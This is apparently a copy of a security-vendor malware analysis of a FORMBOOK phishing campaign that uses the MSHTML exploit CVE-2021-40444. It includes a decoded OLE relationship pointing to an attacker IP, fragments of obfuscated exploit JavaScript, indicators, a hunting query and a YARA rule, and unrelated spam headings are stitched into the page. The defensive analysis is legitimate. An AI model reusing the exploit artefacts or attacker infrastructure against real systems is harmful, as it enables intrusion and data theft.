FORMBOOK Adopts CAB-less Approach

How to solve Coverage Related Denials PR26 – PR27 – Chapter 36
How to solve Coverage Related Denials PR26 – PR27 – Chapter 36

FORMBOOK Adopts CAB-less Approach

The Elastic Intelligence & Analytics team is tracking a new FORMBOOK information-stealing campaign leveraging the MSHTML remote code exploit (CVE-2021-40444). This campaign has been observed sharing infrastructure between the Weaponization phases of both the testing and production releases.

We have observed, and will discuss, three phases of this campaign relevant to defenders:

  • Testing phase using CVE-2021-40444
  • Production phase using CVE-2021-40444
  • Generic phase without CVE-2021-40444

As of November 8, 2021, Elastic observed network infrastructure actively being used to deploy the FORMBOOK information stealer and acting as a command and control endpoint serving archives, implants, and scripts leveraged throughout the campaign variations.

We wanted to call out some great adjacent research from the team as Sophoslabs Uncut that was released on December 21, 2021. Research groups frequently analyze similar, or in this case, the same campaigns through their lens. This is fantastic as it gets more eyes, from different perspectives, onto the same problem. If you’re looking for more information, please check out their research over on their blog.

  • The speed at which vulnerability PoC’s are being released highlights the need to leverage threat hunting to identify post-exploitation events before patches can be applied
  • A FORMBOOK campaign was observed combining infrastructure that allowed testing and production phases to be linked together
  • Patching for the MSHTML exploit appears to be effective as the campaign shifted from attempting to use the exploit to a traditional phishing malware-attachment approach
  • The campaign required a multi-process attack chain to load a DLL file onto victim systems

On September 7, 2021, Microsoft confirmed a vulnerability for the browser rendering engine used in several applications such as those within the Microsoft Office suite. Within three days [1] [2], proof-of-concept code was released, highlighting the maturity of the exploit development ecosystem and underscoring the importance of proactive threat hunting and patch management strategies.

Based on telemetry, we observed this exploit used in conjunction with the FORMBOOK information stealer. We also identified an adversary tradecraft oversight that led to us connecting what appeared to be campaign testing infrastructure and a FORMBOOK phishing campaign targeting manufacturing victims with global footprints.

This post details the tactics, techniques, and procedures (TTPs) of this campaign. Our goal is to enable detection capabilities for security practitioners using the Elastic Stack and any readers concerned with the CVE-2021-40444 vulnerability or campaigns related to FORMBOOK.

Additionally, this highlights the maturity of the exploit development community — underscoring the importance of proactive measures (like network and endpoint monitoring, anti-spam/phishing countermeasures, email MIME-type attachment policies, etc.) and an exercised patch management strategy.

At a high level, an attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that will allow for code to be remotely executed on a victim machine. While this vulnerability is well documented, security researcher

We initiated several collection techniques simultaneously, including searching for malicious attachments that would be included in phishing emails — one of the most common mechanisms for distributing exploit code. We noticed that not many malicious email attachments had been reported, and by October 28, 2021, we were only able to identify four instances of this exploit leveraged with email. In addition to the four instances of the exploit, we observed the threat actor attempting to leverage a generic phishing approach with the FORMBOOK malware as an attachment.

The next following sections will break down these different campaign sightings and their respective details:

  • Testing
  • Production
  • Generic

Throughout the Details section, it is important to note a few things that are required for this attack chain to function, irrespective of the Testing or Production phases

1. A major challenge for the campaign is to get a DLL file onto the victim system

2. ActiveX controls are DLL files with special constraints

3. Web pages can link ActiveX controls directly or load files that are contained in a URL — this is not recommended by Microsoft because file signatures cannot be validated

The first sighting contained an email with a single attachment with a sender of admin0011[@] While researching that email address, we discovered this email address associated with additional malicious samples in VirusTotal. The email observed in this phase included a single attachment called Request Details.docx.

Testing phase lure email

Email attachments are stored as Base64 encoded strings in the email. To extract the Request Details.docx email attachment, we can use the echo command to send the Base64 encoded string to STDOUT, pipe it to the base64 program, and save it as email-attachment so that we can analyze it.

$ echo "UEsDBBQAAAAIAFCELVO0gTweZgEAAIgFAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbLVUyWrDMBC9F/oPRtdgK+...truncated..." | base64 -D -o email-attachment

$ file email-attachment email-attachment: Microsoft Word 2007+

$ unzip email-attachment Archive: email-attachment inflating: [Content_Types].xml inflating: docProps/app.xml inflating: docProps/core.xml inflating: word/document.xml inflating: word/fontTable.xml inflating: word/settings.xml inflating: word/styles.xml inflating: word/webSettings.xml inflating: word/media/image1.jpeg inflating: word/media/image2.wmf inflating: word/theme/theme1.xml inflating: word/_rels/document.xml.rels inflating: _rels/.relsRead more

Within the document relationship file (word/_rels/document.xml.rels), we can view metadata about how different elements of the document are related to each other.

$ cat word/_rels/document.xml.rels <?xml version="1.0" encoding="UTF-8" standalone="yes"?> ...truncated... <Relationship Id="rId6" Type="" Target="MHTML:&#x48;&#x54;&#x54;&#x50;&#x3a;&#x5c;&#x5c;&#x31;&#x30;&#x34;&#x2e;&#x32;&#x34;&#x34;&#x2e;&#x37;&#x38;&#x2e; &#x31;&#x37;&#x37;&#x5c;&#x50;&#x6f;&#x70;&#x65;&#x2e;&#x74;&#x78;&#x74;&#x21" TargetMode="External"/> ...truncated </Relationships>

From here, we can see an externally linked MHTML OLE object inside an element using HTML entities, which reserve characters in HTML. HTML entities are natively not human readable, so they need to be decoded. Using the data analyzer and decoder from the United Kingdom’s Government Communications Headquarters (GCHQ), CyberChef, we were able to quickly decode the HTML entities with the “From HTML Entity” recipe (CyberChef recipes are pre-configured data parsers and decoders).

  Rinnai 252WN2 NG Convector Gas Heater

The decoded HTML entity was HTTP:\\104[.]244[.]78[.]177\Pope.txt. This provided us with another atomic indicator to add to the admin0011[@] email address we’d previously collected, 104[.]244[.]78[.]177. Additionally, the decoded HTML entity revealed another file that could be of interest, Pope.txt.

Decoded HTML entity from the email attachment

We retrieved a copy of Pope.txt from 104[.]244[.]78[.]177 and observed that it contained JavaScript code using variable renaming and string obfuscation. This JavaScript performs the following functions:

  • Downloads a Cabinet archive file called from the same IP address but fails to extract it
  • Creates several ActiveX objects (which are executable applications or libraries) to be loaded into the browser rendering engine
  • Uses the CVE-2021-40444 vulnerability with the ActiveX objects to perform directory traversal and execute a file called IEcache.inf. This filename is the DLL loader from the ASL IT Security PoC code and doesn’t exist in this test run

Obfuscated JavaScript file

The above figure shows the notable section of the obfuscated JavaScript code. We used a debugger to parse out the results of the lookup functions (shown commented out with //‘s). This revealed the classid (CLSID:edbc374c-5730-432a-b5b8-de94f0b57217) attribute which appears across the web in various other malware analyses of CVE-2021-40444. This suggests with moderate confidence that this JavaScript was crafted using some repurposed code that has been open-sourced. The classid attribute is used to determine if has already been downloaded — if it has, it won’t attempt to download it again.

Once is downloaded and extracted, the extracted file must be located. This is why there are multiple directory execution attempts observed in JavaScript. All the work up to this point is to get the DLL (IEcache.inf) onto the filesystem. Finally, the DLL file would be executed as a control panel file (.cpl), because control panel files can be loaded as DLLs.

Elastic Analyzer showing attempts to execute IECache.inf

In our sample, does not include the ASL IT Security PoC DLL (IEcache.inf). It included a file called 1.doc.inf.

From we used the file archive utility, 7-Zip, to extract 1.doc.inf. This file is interesting because it has the .inf (setup information file) extension, but in using the file command, we can see that it is actually a DLL file, meaning that the file type is being obfuscated.

$ 7z e 7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28 p7zip Version 17.04 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64) Scanning the drive for archives: 1 file, 6060053 bytes (5919 KiB) Extracting archive: -- Path = Type = Cab Physical Size = 6060053 Method = None Blocks = 1 Volumes = 1 Volume Index = 0 ID = 1234 Everything is Ok Size: 4465152 Compressed: 6060053 $ file 1.doc.inf 1.doc.inf: PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsRead more

=== IMPORTS === MODULE_NAME HINT ORD FUNCTION_NAME bcrypt.dll 0 BCryptSetProperty 0 GetKeyState ADVAPI32.dll 0 RegDeleteKeyW SHELL32.dll 0 ShellExecuteExA urlmon.dll 0 URLDownloadToFileW WS2_32.dll 9 ole32.dll 0 CoInitializeSecurity NETAPI32.dll 0 NetLocalGroupAddMembers OLEAUT32.dll 8 PSAPI.DLL 0 GetModuleFileNameExW 0 WTSSendMessageW 0 GetProcessWindowStation 0 LocalAlloc 0 GetModuleFileNameW 0 GetProcessAffinityMask 0 SetProcessAffinityMask 0 SetThreadAffinityMask 0 Sleep 0 ExitProcess 0 FreeLibrary 0 LoadLibraryA 0 GetModuleHandleA 0 GetProcAddress 0 GetProcessWindowStation 0 GetUserObjectInformationWRead more

$ pedump --sections 1.doc.inf | awk '{print $1, $2, $3, $4}' === SECTIONS === NAME RVA VSZ RAW_SZ .text 1000 12ecd 0 .rdata 14000 49ce 0 .data 19000 1350d8 0 .vmp1 14f000 2c70 0 .vmp0 152000 fac 0 .bss 153000 1000 0 .vmp2 154000 38c0bb 0 .vmp3 4e1000 5c6720 5c6800 .reloc aa8000 5b4 600Read more

As we were unable to analyze the VMProtected file, we continued to explore other information that we’d previously collected. Specifically, we searched for additional samples that had been sent using the same admin0011[@] email address. These parallel analyses identified additional samples and campaign phases, which we’re referring to as the Production and Generic phases.

Production phase lure email

$ file Profile.rar Profile.rar: data

The attachment has a RAR file extension, but instead of having a file type of RAR archive data, v5, it is raw data. Analysts who discover a file containing raw data can use the less command to dump the file contents to STDOUT to directly inspect what may be inside.


The raw data includes a script job element that can be natively interpreted by the Windows Script Host (WSH). The job element directs WSH to spawn a shell that spawns a hidden PowerShell process which then runs a Base64 encoded PowerShell script. However, the script job element needs to be executed, which isn’t done by double-clicking on the file.

  Common Coding Denials You Need to Know for Faster Payments

Decoding this string, we can see that a file called abb01.exe is downloaded and executed from 104[.]244[.]78[.]177. This is the same IP address we have observed across all Testing and Production phases.


We’ll continue to explore this file to identify how the script job is executed. As we displayed above, the file still has the Rar! header, so we can decompress this archive. First, we’ll use the unrar program with the e switch to decompress the RAR archive and retrieve the contents: document.docx.

$ unrar e Profile.rar Extracting from Profile.rar Extracting document.docx OK All OK

While Profile.rar appears to be a compressed archive, the PowerShell script won’t download and execute abb01.exe automatically upon decompressing it. To execute that script, the compressed document within Profile.rar, document.docx, must be opened.

Using the same technique as we highlighted in the Testing phase, we decompressed document.docx and examined the document relationship file (word/_rels/document.xml.rels). As previously described, we observed a remote OLE object stored and formatted as an HTML entity code block that we can decode using CyberChef.

Decoded document.docx HTML entities

We see the same IP address, 104[.]244[.]78[.]177 and a new filename called Profile.html.

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" ""> <html xmlns="" lang="en" xml:lang="en"><head> <meta content="text/html; charset=UTF-8" http-equiv="Content-Type" /> <!-- XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX This file is generated from xml source: DO NOT EDIT XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX --> <title>Getting Started - Apache HTTP Server Version 2.5</title> ...truncated… <script>function a(){var l=['wexcKvyUWOi','ntu3ndaWmeHNC0HOsq','nfPrsujOwG','amohWRqfW5xcNSk/r23cO8kClG',' iSkfW5hcTSk4jmk4xmk2W73dSCkjWOq','ndCXnZeXDLf1tKLj','WRSYCcCZzmkmaW','WQzEqb5xWOldVWXBgSkSWRyp','AhrTBgzPBgu', 'W5tdO1L3WOFdISk8W50','u2nYAxb0','lNDZzJOUlI8UlI8UlI9ezxnRDg9Wl1bYB2zPBguUCMfYpY53C2y','iCkEW592W77cNa', 'WReLW5ddJGiJWRhcRMuYW40LW4v9xSkJWRNcObFdLSkEW5hcMe1kW4JcHL84W7WgWPtcNt4eW4NcP8oZy8kN', 'lNDZzJOUlI8UlI9eB3DUBg9HzhmVuhjVzMLSzs5Yyxi/lNDZzG','ndaWmtu5BvbZqxHH','Bg9JyxrPB24', 'ex3cTSkNW5z+w2RcKGhdLs/dNbBdImoknSk1FwVdQL/cVSkWWRC9WPldO3/dRLv5lt5lW4XFWRVcGWxcNsiX','nZa3mZKWnNP1zffirq', 'bxy1yvlcHujyqSkly2ldHvDrW5vJW7HQW5mZimkKWPJcQJClD0j3WO5SW6KTqmozaWOzACoc','mtKXmZq5mLbREgPOqW','W73dMrjjW53cQaBcVq', ...truncated… ActiveXObject(j(0x144))[k(0x13c,'k0X5')][j(0x14c)]=k(0x14d,'[Otp'),new ActiveXObject('htmlfile')[j(0x146)]['location']=j(0x14a),new ActiveXObject('htmlfile')[k(0x148, 'MCjf')][k(0x138,'kZYE')]=j(0x147),new ActiveXObject(j(0x144))[j(0x146)][k(0x142,'Lz1J')]=k(0x14f,'BiKg'),new ActiveXObject(k(0x145,'h]@1'))[j(0x146)][j(0x14c)]=k(0x13a,'!v$V'));</script>Read more

Deobfuscating the JavaScript using the same debugger as before, we can see several ActiveXObjects. This time, however, there are far fewer and the execution is more prescripted, eliminating useless calls. This shows a refinement from before. This newer code also uses a .wsf extension instead of the previous .cpl. This allows the exploit to use the Windows Scripting Host to execute code. This is the same directory traversal technique we observed in the Testing phase. However, this time the JavaScript is looking for the Profile.rar file (whereas in the Testing phase, it was looking for IECache.inf) and attempting to execute the PowerShell script, which was prepended in Profile.rar as a Windows Script File (.wsf).

Deobfuscated JavaScript showing directory search for the original RAR file

As we illustrated above, Profile.rar has a prepended Base64 encoded PowerShell command which downloads abb01.exe. The JavaScript from Profile.html attempts to execute this PowerShell code within Profile.rar as a Windows Script File.

abb01.exe is a dropper that when dynamically executed, drops another PE file, yxojzzvhi0.exe in our example.

yxojzzvhi0.exe was scanned with Elastic YARA rules and identified to be a variant of FORMBOOK, based on unique byte sequences.

FORMBOOK, also known as XLOADER, is an information stealer that includes keyloggers, clipboard copiers, and form grabber components to collect and exfiltrate sensitive information. This malware has been offered as-a-service for over five years and remains a successful tool for stealing information.

Generic phase lure email

These sightings all have two RAR attachments. One of the attachments has a .rar file extension and the other has either a .gz or .7z extension. We’ll explore one of the sightings below.

$ file D2110-095.gz DWG.rar D2110-095.gz: RAR archive data, v5 DWG.rar: RAR archive data, v5

$ omnihash DWG.exe D2110-095.exe Hashing file DWG.exe MD5: ff882802d113ed02fa070c496f89d797 SHA1: aad1eed1c53f1d33ab52e13442b036bfeee91f1b SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096 Hashing file D2110-095.exe MD5: ff882802d113ed02fa070c496f89d797 SHA1: aad1eed1c53f1d33ab52e13442b036bfeee91f1b SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096

Campaign artifact associations

Throughout all sightings, the campaign used similar sending email addresses:

  • admin0011[@]
  • admin010[@]
  • admin012[@]

Additionally, across the Production and Generic phases of the campaign, we observed the X-Mailer element (the software identifier set by the sending email client) as RainLoop/1.16.0. RainLoop is an open-source email client. It should be noted that in our collection, one sighting had some header information sanitized before being uploaded to VirusTotal. RainLoop could have been referenced in this sighting, but we were not able to confirm that.

As research progressed, we observed activities we believed were capability testing. This activity was observed one time and used artifacts (IEcache.inf, document.xml.rels) from a public CVE-2021-40444 exploit proof-of-concept repository. Other phases included custom exploit code that differed from the PoC code but shared initial access and execution TTPs as well as the same network infrastructure.

We observed that the issratech[.]com, backsjoy[.]com, and leoeni[.]com domains own TLS certificates provided by Let’s Encrypt. While the steps of creating a TLS certificate are not overly cumbersome, the fact that the domain owner went through the preparatory process of creating a certificate could indicate that these domains are intended to be used for future encrypted operations.

In the Generic phase, the campaign abandoned the MSHTML exploit and attempted to leverage a traditional phishing malware-attachment approach. This shift in tactics is possibly because successful exploit patching rendered the vulnerability ineffective.

We observed that of the four companies targeted by this campaign, all were in the manufacturing vertical. Threat actors utilizing FORMBOOK have been observed targeting the manufacturing vertical in the past. The companies all had international footprints in:

  • Industrial Materials, Aluminum extrusion, HQ in Germany (Testing phase)
  • Industrial Conglomerate, Industrial Chemicals, HQ in South Korea (Production phase)
  • Industrial Manufacturing Products and Consulting, HQ in Switzerland (Generic phase)
  • Industrial Mechanical Engineering and Manufacturing, HQ in Germany (Generic phase)
  3 Ways Denial Analytics Improves Healthcare Organizations

While the targeted companies are of note (in that they are in the same vertical), an email address domain observed in all three phases — issratech[.]com, appears similar to a legitimate Jamaican company domain, isratech[.]com (notice the difference between one and two s’s), a business that specializes in irrigation, wastewater management, and solar energy. Below, is a screenshot of issratech[.]com using the default CyberPanel landing page. CyberPanel is a web hosting tool for WordPress sites.

Issratech landing page

Each targeted company of the admin0011[@] email address have expertise or products that could have been valuable to an Isratch project listed on their projects page (https://www.isratech[.]com/projects/):

  • Chemical: Waste-water treatment, dairy production sanitation
  • Extruded aluminum: Solar array scaffolding, greenhouses

Two additional email address domains were observed in the Generic phase — one appears to be mimicking a legitimate medical equipment manufacturer (backjoy[.]com) and the other (leonei[.]com) appears to be adversary controlled, but seemingly not being used for legitimate purposes.

Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.

Observed techniques/sub techniques

  • Acquire infrastructure – server
  • Obtain capabilities – malware and exploits
  • Stage capabilities – upload malware
  • Phishing – attachment
  • Command and scripting interpreter – PowerShell
  • Exploitation for client execution

These queries can be used in Kibana’s Security → Timelines → New Timeline → Correlation query editor. While these queries will identify this intrusion set, they can also identify other events of note that, once investigated, could lead to other malicious activities.

This query will identify the CVE-2021-40444 exploit attempt from a malicious Access, Publisher, PowerPoint, or Word document.

process where event.type in ("start", "process_started") and : ("eqnedt32.exe", "excel.exe", "fltldr.exe", "msaccess.exe", "mspub.exe", "powerpnt.exe", "winword.exe") and process.command_line : ("*../../..*", "*..\\..\\*", "*cpl:..*", "*hta:..*", "*js:..*", "*jse:..*", "*sct:..*", "*vbs:..*", "*wsf:..*")

Hunt query identifies CVE-2021-40444 exploit using Timelines

rule Windows_Trojan_FORMBOOK { meta: author = "Elastic Security" creation_date = "2021-06-14" last_modified = "2021-08-23" os = "Windows" arch = "x86" category_type = "Trojan" family = "FORMBOOK" threat_name = "Windows.Trojan.FORMBOOK" reference_sample = "6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a" strings: $a1 = { 3C 30 50 4F 53 54 74 09 40 } $a2 = { 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 } $a3 = { 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 } $a4 = { 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 } condition: any of them }Read more

The following steps can be leveraged to improve a network’s protective posture:

  1. Review and implement the above detection logic within your environment using technology such as Sysmon and the Elastic Endpoint or Winlogbeat
  2. Review and ensure that you have deployed the latest Microsoft Security Updates
  3. Maintain backups of your critical systems to aid in quick recovery

The following research was referenced throughout the document:

IndicatorTypeReference from blogNote
70defbb4b846868ba5c74a526405f2271ab71de01b24fbe2d6db2c7035f8a7dfSHA256Request Document.docxTesting phase email attachment
7c98db2063c96082021708472e1afb81f3e54fe6a4a8b8516e22b3746e65433bSHA256comres.cabTesting phase CAB archive
363837d5c41ea6b2ff6f6184d817c704e0dc5749e45968a3bc4e45ad5cf028d7SHA2561.doc.infTesting phase VMProtect DLL
22cffbcad42363841d01cc7fef290511c0531aa2b4c9ca33656cc4aef315e723SHA256IEcache.infTesting phase DLL loader
e2ab6aab7e79a2b46232af87fcf3393a4fd8c4c5a207f06fd63846a75e190992SHA256Pope.txtTesting phase JavaScript
170eaccdac3c2d6e1777c38d61742ad531d6adbef3b8b031ebbbd6bc89b9add6SHA256Profile.rarProduction phase email attachment
d346b50bf9df7db09363b9227874b8a3c4aafd6648d813e2c59c36b9b4c3fa72SHA256document.docxProduction phase compressed document
776df245d497af81c0e57fb7ef763c8b08a623ea044da9d79aa3b381192f70e2SHA256abb01.exeProduction phase dropper
95e03836d604737f092d5534e68216f7c3ef82f529b5980e3145266d42392a82SHA256Profile.htmlProduction phase JavaScript
bd1c1900ac1a6c7a9f52034618fed74b93acbc33332890e7d738a1d90cbc2126SHA256yxojzzvhi0.exeFORMBOOK malware
0c560d0a7f18b46f9d750e24667721ee123ddd8379246dde968270df1f823881SHA256DWG.rarGeneric phase email attachment
5a1ef64e27a8a77b13229b684c09b45a521fd6d4a16fdb843044945f12bb20e1SHA256D2110-095.gzGeneric phase email attachment
4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096SHA256D2110-095.exe DWG.exeFORMBOOK malware
admin0011[@]issratech.comemail-addrPhishing sending email address
admin010[@]backsjoy.comemail-addrPhishing sending email address
admin012[@]leoeni.comemail-addrPhishing sending email address
issratech[.]comdomain-nameAdversary controlled domain
backsjoy[.]comdomain-nameAdversary controlled domain
leonei[.]comdomain-nameAdversary controlled domain
2[.]56[.]59[.]105ipv4-addrIP address of issratech[.]com
212[.]192[.]241[.]173ipv4-addrIP address of backsjoy[.]com
52[.]128[.]23[.]153ipv4-addrIP address of leonei[.]com
104[.]244[.]78[.]177ipv4-addrAdversary controlled IP address

Artifacts are also available for download in both ECS and STIX format in a combined zip bundle.

See all top stories


Elastic Security Labs is tracking likely multiple on-net threat actors leveraging Exchange exploits, web shells, and the newly discovered SiestaGraph implant to achieve and maintain access, escalate privilege, and exfiltrate targeted data.


We added a Living off the land (LotL) detection package to the Integrations app in Kibana. In a single click, you can install and start using the ProblemChild model and associated assets including anomaly detection configurations and detection rules.

Bạn đang xem bài viết: FORMBOOK Adopts CAB-less Approach. Thông tin do THCS Nguyễn Thanh Sơn chọn lọc và tổng hợp cùng với các chủ đề liên quan khác.

Leave a Comment